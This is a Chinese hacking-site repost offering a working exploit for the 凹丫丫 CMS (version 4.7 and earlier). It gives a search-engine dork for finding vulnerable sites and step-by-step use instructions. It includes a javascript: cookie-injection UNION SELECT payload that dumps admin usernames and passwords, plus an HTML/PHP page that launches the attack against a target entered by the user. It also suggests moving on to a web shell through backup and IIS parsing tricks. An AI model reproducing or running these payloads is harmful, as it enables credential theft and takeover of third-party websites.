欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

凹丫丫 4.7 及其以下版本通杀0day

来源:本站转载 作者:佚名 时间:2010-05-14 TAG: 我要投稿

EXP:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>-hi.baidu.com/5427518-</title>
</head>
<style type="text/css">
<!--
.STYLE1 { font-size:13px ; font-family: Arial, Helvetica, sans-serif}
-->
</style>
<span class="STYLE1">凹丫丫 4.7 及其以下版本通杀Xday<br><br>仅供学习研究,使用者若违反法律后果自负<br><br>说明:<br>
0.google : inurl:/otype.asp?classid= <br>
1.键入目标站,没意外的话你会等上一会,因为要等脚本超时出错,建议去喝茶。<br>
2.然后地址栏键入下面的代码,进行JavaScript hijack。<br>
3.刷新一次,右键查看源文件,用户名密码就出来了。<br>
4.要是你RP不好,楞没爆出来,那就先清理干净cookie再玩。<br>
5.如果没有oyaya.asp,原因很可能是目标站版本低于4.7,老版本直接cookie注射。<br><br>
<font color=red>
javascript:alert(document.cookie="n="+escape("2 1 as id,2 as title,admin&password as oStyle,4,5,6,7,8,9 from admin union all select top 1"));
</font>
<form action="" method="post" enctype="multipart/form-data" class="STYLE1">
<br><br>
准备好了就填写吧!示例:www.hackqing.cn<br><br>
目标站:<input type="text" name="a" />
<input type="submit" name="submit" value="提交" /><br><br>
后台备份,iis解析,随你怎么用。
</form></span>
<span class="STYLE1">
<?php
if(!empty($_POST['a']))
{
header("Location: http://".$_POST['a']."/oyaya.asp");
}
?></span>

以上代码保存为htm,或html

注:首发T00ls pking

 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载